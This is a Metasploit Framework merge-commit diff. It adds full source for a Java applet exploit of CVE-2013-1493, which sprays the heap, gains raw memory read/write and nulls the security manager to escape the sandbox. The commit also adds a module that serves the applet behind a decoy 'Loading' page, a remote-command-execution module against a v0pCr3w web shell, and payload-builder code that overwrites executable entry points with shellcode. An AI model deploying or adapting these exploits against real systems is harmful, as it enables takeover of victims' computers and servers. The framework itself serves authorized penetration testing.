Merge branch 'master' of https://github.com/rapid7/metasploit-framework
commit
6cd6a7d6b9
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,232 @@
|
|||
import java.applet.Applet;
|
||||
import java.awt.color.ColorSpace;
|
||||
import java.awt.image.BufferedImage;
|
||||
import java.awt.image.ColorConvertOp;
|
||||
import java.awt.image.ColorModel;
|
||||
import java.awt.image.ComponentColorModel;
|
||||
import java.awt.image.ComponentSampleModel;
|
||||
import java.awt.image.SampleModel;
|
||||
import metasploit.Payload;
|
||||
|
||||
public class Init extends Applet {
|
||||
|
||||
private static final long serialVersionUID = 1L;
|
||||
static final int ARRAY_MAGIC = -1341411317;
|
||||
static final int ARRAY_OLDSIZE = 11;
|
||||
static final int ARRAY_NEWSIZE = 2147483647;
|
||||
static final int LEAK_MAGIC = -559035650;
|
||||
static final int SPRAY_ARRAY_COUNT = 2808685;
|
||||
static final int SPRAY_LEAK_COUNT = 2000000;
|
||||
volatile Leak[] _sleaks;
|
||||
volatile int[][] _sarrays;
|
||||
volatile int[] _bigArray;
|
||||
int[] _memBaseObj;
|
||||
long _memBaseIdx;
|
||||
long _memBasePtr;
|
||||
int[] soffsets;
|
||||
int[] doffsets;
|
||||
|
||||
|
||||
public Init()
|
||||
{
|
||||
this.soffsets = new int[] { 0, 1, 2, 3 };
|
||||
this.doffsets = new int[] { 0, 1, 2, 50000000 };
|
||||
}
|
||||
|
||||
void spray() throws Exception
|
||||
{
|
||||
Runtime.getRuntime().gc();
|
||||
Runtime.getRuntime().gc();
|
||||
|
||||
this._sleaks = new Leak[2000000];
|
||||
this._sarrays = new int[2808685][];
|
||||
try
|
||||
{
|
||||
for (int i = 0; i < this._sarrays.length; i++) {
|
||||
this._sarrays[i] = new int[11];
|
||||
for (int j = 0; j < this._sarrays[i].length; j++) {
|
||||
this._sarrays[i][j] = -1341411317;
|
||||
}
|
||||
}
|
||||
|
||||
for (int i = 0; i < this._sleaks.length; i++)
|
||||
this._sleaks[i] = new Leak("L");
|
||||
}
|
||||
catch (OutOfMemoryError localOutOfMemoryError)
|
||||
{
|
||||
}
|
||||
}
|
||||
|
||||
void getBigArray() throws Exception
|
||||
{
|
||||
for (int i = 0; i < this._sarrays.length; i++) {
|
||||
for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
|
||||
this._sarrays[i][j] = -1341411317;
|
||||
}
|
||||
}
|
||||
|
||||
for (int i = 0; i < this._sarrays.length; i++) {
|
||||
if (this._sarrays[i].length != 2147483647) {
|
||||
for (int j = 0; (j < this._sarrays[i].length) && (j < 22); j++) {
|
||||
if ((j > 0) && (this._sarrays[i][(j - 1)] != -1341411317) && (this._sarrays[i][j] == -1341411317)) {
|
||||
this._sarrays[i][(j - 1)] = 2147483647;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
for (int i = 0; i < this._sarrays.length; i++) {
|
||||
if ((this._sarrays[i].length == 11) || (this._bigArray != null) || (this._sarrays[i].length != 2147483647))
|
||||
continue;
|
||||
this._bigArray = this._sarrays[i];
|
||||
}
|
||||
|
||||
if (this._bigArray == null)
|
||||
throw new Exception("fail");
|
||||
}
|
||||
|
||||
long getAddress(Object obj) throws Exception
|
||||
{
|
||||
for (int i = 0; i < this._bigArray.length; i++) {
|
||||
if (this._bigArray[i] == -559035650) {
|
||||
int flag = 0;
|
||||
|
||||
for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = null;
|
||||
flag += (this._bigArray[(i + 1)] == 0 ? 1 : 0);
|
||||
|
||||
for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = "X";
|
||||
flag += (this._bigArray[(i + 1)] != 0 ? 1 : 0);
|
||||
|
||||
if (flag == 2) {
|
||||
for (int j = 0; j < this._sleaks.length; j++) this._sleaks[j].obj = obj;
|
||||
return this._bigArray[(i + 1)];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
throw new Exception("fail");
|
||||
}
|
||||
|
||||
void getMemBase() throws Exception
|
||||
{
|
||||
for (int i = 0; i < this._sarrays.length; i++) {
|
||||
for (int j = 0; (j < this._sarrays[i].length) && (j < 11); j++) {
|
||||
this._sarrays[i][j] = (j == 1 ? i : -1341411317);
|
||||
}
|
||||
}
|
||||
|
||||
for (int i = 0; i < this._bigArray.length; i++) {
|
||||
if ((i > 0) && (this._bigArray[(i - 1)] != -1341411317) && (this._bigArray[i] == -1341411317) && (this._bigArray[(i + 1)] != -1341411317)) {
|
||||
int len = this._bigArray[(i - 1)];
|
||||
int idx = this._bigArray[(i + 1)];
|
||||
if ((idx >= 0) && (idx < this._sarrays.length) && (this._sarrays[idx] != null) && (this._sarrays[idx].length == len)) {
|
||||
this._memBaseObj = this._sarrays[idx];
|
||||
this._memBaseIdx = i;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (this._memBaseObj == null) {
|
||||
throw new Exception("fail");
|
||||
}
|
||||
|
||||
this._memBasePtr = getAddress(this._memBaseObj);
|
||||
|
||||
if (this._memBasePtr == 0L) {
|
||||
throw new Exception("fail");
|
||||
}
|
||||
|
||||
this._memBasePtr += 12L;
|
||||
}
|
||||
|
||||
int rdMem(long addr)
|
||||
{
|
||||
long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
|
||||
if ((offs >= 0L) && (offs < 2147483647L)) {
|
||||
return this._bigArray[(int)offs];
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
void wrMem(long addr, int value)
|
||||
{
|
||||
long offs = this._memBaseIdx + (addr - this._memBasePtr) / 4L;
|
||||
if ((offs >= 0L) && (offs < 2147483647L))
|
||||
this._bigArray[(int)offs] = value;
|
||||
}
|
||||
|
||||
void privileged()
|
||||
{
|
||||
try
|
||||
{
|
||||
Payload.main(null);
|
||||
} catch (Exception localException) {
|
||||
//localException.printStackTrace();
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
public void init()
|
||||
{
|
||||
try
|
||||
{
|
||||
if (System.getSecurityManager() == null) {
|
||||
privileged();
|
||||
return;
|
||||
}
|
||||
|
||||
int sWidth = 168; int sHeight = 1;
|
||||
int spStride = 4; int ssStride = spStride * sWidth;
|
||||
|
||||
int dWidth = sWidth; int dHeight = sHeight;
|
||||
int dpStride = 1; int dsStride = 0;
|
||||
|
||||
ColorSpace scs = new MyColorSpace(0, this.soffsets.length - 1);
|
||||
ColorModel scm = new ComponentColorModel(scs, true, false, 1, 0);
|
||||
SampleModel ssm = new ComponentSampleModel(0, sWidth, sHeight, spStride, ssStride, this.soffsets);
|
||||
BufferedImage sbi = new MyBufferedImage(sWidth, sHeight, 6, 0, scm, ssm);
|
||||
|
||||
for (int i = 0; i < ssStride; i++) {
|
||||
sbi.getRaster().getDataBuffer().setElem(i, 1);
|
||||
}
|
||||
|
||||
ColorSpace dcs = new MyColorSpace(0, this.doffsets.length - 1);
|
||||
ColorModel dcm = new ComponentColorModel(dcs, true, false, 1, 0);
|
||||
SampleModel dsm = new ComponentSampleModel(0, dWidth, dHeight, dpStride, dsStride, this.doffsets);
|
||||
BufferedImage dbi = new MyBufferedImage(sWidth, sHeight, 10, 0, dcm, dsm);
|
||||
|
||||
ColorConvertOp cco = new ColorConvertOp(null);
|
||||
|
||||
spray();
|
||||
try
|
||||
{
|
||||
cco.filter(sbi, dbi);
|
||||
}
|
||||
catch (Exception localException) { }
|
||||
getBigArray();
|
||||
|
||||
getMemBase();
|
||||
|
||||
long sys = getAddress(System.class);
|
||||
long sm = getAddress(System.getSecurityManager());
|
||||
sys = rdMem(sys + 4L);
|
||||
for (int i = 0; i < 2000000; i++) {
|
||||
long addr = sys + i * 4;
|
||||
int val = rdMem(addr);
|
||||
if (val == sm) {
|
||||
wrMem(addr, 0);
|
||||
if (System.getSecurityManager() == null) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
privileged();
|
||||
}
|
||||
catch (Exception localException1)
|
||||
{
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
}
|
|
@ -0,0 +1,14 @@
|
|||
class Leak
|
||||
{
|
||||
public volatile int magic;
|
||||
public volatile Object obj;
|
||||
public volatile Object obj2;
|
||||
public volatile Object obj3;
|
||||
public volatile Object obj4;
|
||||
|
||||
public Leak(Object o)
|
||||
{
|
||||
this.magic = -559035650;
|
||||
this.obj = o;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,20 @@
|
|||
CLASSES = \
|
||||
Init.java \
|
||||
Leak.java \
|
||||
MyBufferedImage.java \
|
||||
MyColorSpace.java
|
||||
|
||||
.SUFFIXES: .java .class
|
||||
.java.class:
|
||||
javac -source 1.5 -target 1.5 -cp "../../../../data/java:." $*.java
|
||||
|
||||
all: $(CLASSES:.java=.class)
|
||||
|
||||
install:
|
||||
mv Init.class ../../../../data/exploits/cve-2013-1493/
|
||||
mv Leak.class ../../../../data/exploits/cve-2013-1493/
|
||||
mv MyBufferedImage.class ../../../../data/exploits/cve-2013-1493/
|
||||
mv MyColorSpace.class ../../../../data/exploits/cve-2013-1493/
|
||||
|
||||
clean:
|
||||
rm -rf *.class
|
|
@ -0,0 +1,49 @@
|
|||
import java.awt.image.BufferedImage;
|
||||
import java.awt.image.ColorModel;
|
||||
import java.awt.image.SampleModel;
|
||||
|
||||
class MyBufferedImage extends BufferedImage
|
||||
{
|
||||
int _fakeType;
|
||||
ColorModel _fakeColorModel;
|
||||
SampleModel _fakeSampleModel;
|
||||
|
||||
public MyBufferedImage(int width, int height, int imageType, int fakeType, ColorModel fakeColorModel, SampleModel fakeSampleModel)
|
||||
{
|
||||
super(width,height, imageType);
|
||||
|
||||
this._fakeType = fakeType;
|
||||
this._fakeColorModel = fakeColorModel;
|
||||
this._fakeSampleModel = fakeSampleModel;
|
||||
}
|
||||
|
||||
public int getType()
|
||||
{
|
||||
String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
|
||||
if (caller.contains("ICC_Transform.getImageLayout(")) {
|
||||
return this._fakeType;
|
||||
}
|
||||
|
||||
return super.getType();
|
||||
}
|
||||
|
||||
public ColorModel getColorModel()
|
||||
{
|
||||
String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
|
||||
if ((caller.contains("ICC_Transform.getImageLayout(")) || (caller.contains("CMMImageLayout.<init>("))) {
|
||||
return this._fakeColorModel;
|
||||
}
|
||||
|
||||
return super.getColorModel();
|
||||
}
|
||||
|
||||
public SampleModel getSampleModel()
|
||||
{
|
||||
String caller = java.lang.Thread.currentThread().getStackTrace()[2].toString();
|
||||
if (caller.contains("ICC_Transform.getImageLayout(")) {
|
||||
return this._fakeSampleModel;
|
||||
}
|
||||
|
||||
return super.getSampleModel();
|
||||
}
|
||||
}
|
|
@ -0,0 +1,15 @@
|
|||
import java.awt.color.ColorSpace;
|
||||
|
||||
class MyColorSpace extends ColorSpace
|
||||
{
|
||||
private static final long serialVersionUID = 1L;
|
||||
|
||||
public MyColorSpace(int type, int numcomponents)
|
||||
{
|
||||
super(type,numcomponents);
|
||||
}
|
||||
public float[] fromCIEXYZ(float[] value) { return null; }
|
||||
public float[] toCIEXYZ(float[] value) { return null; }
|
||||
public float[] fromRGB(float[] value) { return null; }
|
||||
public float[] toRGB(float[] value) { return null; }
|
||||
}
|
|
@ -313,8 +313,8 @@ class Auxiliary::Web::HTTP
|
|||
# This is bad but we can't anticipate the gazilion different types of network
|
||||
# i/o errors between Rex and Errno.
|
||||
rescue => e
|
||||
print_error e.to_s
|
||||
e.backtrace.each { |l| print_error l }
|
||||
elog e.to_s
|
||||
e.backtrace.each { |l| elog l }
|
||||
Response.empty
|
||||
end
|
||||
|
||||
|
|
|
@ -127,6 +127,13 @@ require 'digest/sha1'
|
|||
end
|
||||
# XXX: Add remaining MIPSLE systems here
|
||||
end
|
||||
|
||||
if(arch.index(ARCH_MIPSBE))
|
||||
if(plat.index(Msf::Module::Platform::Linux))
|
||||
return to_linux_mipsbe_elf(framework, code)
|
||||
end
|
||||
# XXX: Add remaining MIPSLE systems here
|
||||
end
|
||||
nil
|
||||
end
|
||||
|
||||
|
@ -357,6 +364,41 @@ require 'digest/sha1'
|
|||
exe
|
||||
end
|
||||
|
||||
def self.to_win32pe_only(framework, code, opts={})
|
||||
|
||||
# Allow the user to specify their own EXE template
|
||||
set_template_default(opts, "template_x86_windows_old.exe")
|
||||
|
||||
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
|
||||
|
||||
exe = ''
|
||||
File.open(opts[:template], 'rb') { |fd|
|
||||
exe = fd.read(fd.stat.size)
|
||||
}
|
||||
|
||||
sections_header = []
|
||||
pe._file_header.v['NumberOfSections'].times { |i| sections_header << [(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18+0x24),exe[(i*0x28)+pe.rva_to_file_offset(pe._dos_header.v['e_lfanew']+pe._file_header.v['SizeOfOptionalHeader']+0x18),0x28]] }
|
||||
|
||||
|
||||
#look for section with entry point
|
||||
sections_header.each do |sec|
|
||||
virtualAddress = sec[1][0xc,0x4].unpack('L')[0]
|
||||
sizeOfRawData = sec[1][0x10,0x4].unpack('L')[0]
|
||||
characteristics = sec[1][0x24,0x4].unpack('L')[0]
|
||||
if pe.hdr.opt.AddressOfEntryPoint >= virtualAddress && pe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
|
||||
#put this section writable
|
||||
characteristics|=0x80000000
|
||||
newcharacteristics = [characteristics].pack('L')
|
||||
exe[sec[0],newcharacteristics.length]=newcharacteristics
|
||||
end
|
||||
end
|
||||
|
||||
#put the shellcode at the entry point, overwriting template
|
||||
exe[pe.rva_to_file_offset(pe.hdr.opt.AddressOfEntryPoint),code.length]=code
|
||||
|
||||
return exe
|
||||
end
|
||||
|
||||
|
||||
def self.to_win32pe_old(framework, code, opts={})
|
||||
|
||||
|
@ -615,7 +657,7 @@ require 'digest/sha1'
|
|||
# segments as writable and overwrites the entrypoint (usually _start) with
|
||||
# the payload.
|
||||
#
|
||||
def self.to_exe_elf(framework, opts, template, code)
|
||||
def self.to_exe_elf(framework, opts, template, code, big_endian=false)
|
||||
|
||||
# Allow the user to specify their own template
|
||||
set_template_default(opts, template)
|
||||
|
@ -640,11 +682,21 @@ require 'digest/sha1'
|
|||
# Use the proper offsets and pack size
|
||||
case elf[4]
|
||||
when 1, "\x01" # ELFCLASS32 - 32 bit (ruby 1.8 and 1.9)
|
||||
if big_endian
|
||||
elf[0x44,4] = [elf.length].pack('N') #p_filesz
|
||||
elf[0x48,4] = [elf.length + code.length].pack('N') #p_memsz
|
||||
else # little endian
|
||||
elf[0x44,4] = [elf.length].pack('V') #p_filesz
|
||||
elf[0x48,4] = [elf.length + code.length].pack('V') #p_memsz
|
||||
end
|
||||
when 2, "\x02" # ELFCLASS64 - 64 bit (ruby 1.8 and 1.9)
|
||||
if big_endian
|
||||
elf[0x60,8] = [elf.length].pack('Q>') #p_filesz
|
||||
elf[0x68,8] = [elf.length + code.length].pack('Q>') #p_memsz
|
||||
else # little endian
|
||||
elf[0x60,8] = [elf.length].pack('Q') #p_filesz
|
||||
elf[0x68,8] = [elf.length + code.length].pack('Q') #p_memsz
|
||||
end
|
||||
else
|
||||
raise RuntimeError, "Invalid ELF template: EI_CLASS value not supported"
|
||||
end
|
||||
|
@ -722,6 +774,11 @@ require 'digest/sha1'
|
|||
return elf
|
||||
end
|
||||
|
||||
def self.to_linux_mipsbe_elf(framework, code, opts={})
|
||||
elf = to_exe_elf(framework, opts, "template_mipsbe_linux.bin", code, true)
|
||||
return elf
|
||||
end
|
||||
|
||||
def self.to_exe_vba(exes='')
|
||||
exe = exes.unpack('C*')
|
||||
vba = ""
|
||||
|
@ -1908,6 +1965,11 @@ End Sub
|
|||
output = Msf::Util::EXE.to_win32pe_old(framework, code, exeopts)
|
||||
end
|
||||
|
||||
when 'exe-only'
|
||||
if(not arch or (arch.index(ARCH_X86)))
|
||||
output = Msf::Util::EXE.to_win32pe_only(framework, code, exeopts)
|
||||
end
|
||||
|
||||
when 'elf'
|
||||
if (not plat or (plat.index(Msf::Module::Platform::Linux)))
|
||||
if (not arch or (arch.index(ARCH_X86)))
|
||||
|
@ -1972,7 +2034,7 @@ End Sub
|
|||
end
|
||||
|
||||
def self.to_executable_fmt_formats
|
||||
['dll','exe','exe-small','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net']
|
||||
['dll','exe','exe-small','exe-only','elf','macho','vba','vba-exe','vbs','loop-vbs','asp','aspx','war','psh','psh-net']
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -0,0 +1,91 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'v0pCr3w Web Shell Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a lack of authentication in the shell developed by v0pCr3w
|
||||
and is widely reused in automated RFI payloads. This module takes advantage of the
|
||||
shell's various methods to execute commands.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell'],
|
||||
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => '',
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd'
|
||||
}
|
||||
},
|
||||
'Platform' => ['unix', 'win'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
['v0pCr3w / Unix', { 'Platform' => 'unix' } ],
|
||||
['v0pCr3w / Windows', { 'Platform' => 'win' } ]
|
||||
],
|
||||
'DisclosureDate' => 'Mar 23 2013',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, "The path to the v0pCr3w shell", "/jos.php"]),
|
||||
],self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
shell = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'vars_get' => {
|
||||
'lol' => '1'
|
||||
}
|
||||
})
|
||||
if (shell and shell.body =~ /v0pCr3w\<br\>/ and shell.body =~ /\<br\>nob0dyCr3w/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def http_send_command(cmd)
|
||||
p = Rex::Text.encode_base64(cmd)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path.to_s),
|
||||
'vars_get' => {
|
||||
'osc' => p
|
||||
}
|
||||
})
|
||||
if not (res and res.code == 200)
|
||||
fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
http_send_command(payload.encoded)
|
||||
end
|
||||
end
|
|
@ -0,0 +1,128 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({ :javascript => false })
|
||||
|
||||
def initialize( info = {} )
|
||||
|
||||
super( update_info( info,
|
||||
'Name' => 'Java CMM Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module abuses the Color Management classes from a Java Applet to run
|
||||
arbitrary Java code outside of the sandbox as exploited in the wild in February
|
||||
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
|
||||
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
|
||||
systems. This exploit doesn't bypass click-to-play, so the user must accept the java
|
||||
warning in order to run the malicious applet.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # Vulnerability discovery and Exploit
|
||||
'juan vazquez' # Metasploit module (just ported the published exploit)
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-1493' ],
|
||||
[ 'OSVDB', '90737' ],
|
||||
[ 'BID', '58238' ],
|
||||
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
|
||||
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
|
||||
[ 'URL', 'http://pastie.org/pastes/6581034' ]
|
||||
],
|
||||
'Platform' => [ 'win', 'java' ],
|
||||
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Generic (Java Payload)',
|
||||
{
|
||||
'Platform' => 'java',
|
||||
'Arch' => ARCH_JAVA
|
||||
}
|
||||
],
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 1,
|
||||
'DisclosureDate' => 'Mar 01 2013'
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
def setup
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
|
||||
@init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
|
||||
@leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
|
||||
@buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
|
||||
@color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
|
||||
|
||||
@init_class_name = rand_text_alpha("Init".length)
|
||||
@init_class.gsub!("Init", @init_class_name)
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("handling request for #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /\.jar$/i
|
||||
jar = payload.encoded_jar
|
||||
jar.add_file("#{@init_class_name}.class", @init_class)
|
||||
jar.add_file("Leak.class", @leak_class)
|
||||
jar.add_file("MyBufferedImage.class", @buffered_image_class)
|
||||
jar.add_file("MyColorSpace.class", @color_space_class)
|
||||
metasploit_str = rand_text_alpha("metasploit".length)
|
||||
payload_str = rand_text_alpha("payload".length)
|
||||
jar.entries.each { |entry|
|
||||
entry.name.gsub!("metasploit", metasploit_str)
|
||||
entry.name.gsub!("Payload", payload_str)
|
||||
entry.data = entry.data.gsub("metasploit", metasploit_str)
|
||||
entry.data = entry.data.gsub("Payload", payload_str)
|
||||
}
|
||||
jar.build_manifest
|
||||
|
||||
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
|
||||
when /\/$/
|
||||
payload = regenerate_payload(cli)
|
||||
if not payload
|
||||
print_error("Failed to generate the payload.")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
|
||||
else
|
||||
send_redirect(cli, get_resource() + '/', '')
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def generate_html
|
||||
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
|
||||
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
|
||||
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
|
||||
html += %Q|</applet></body></html>|
|
||||
return html
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue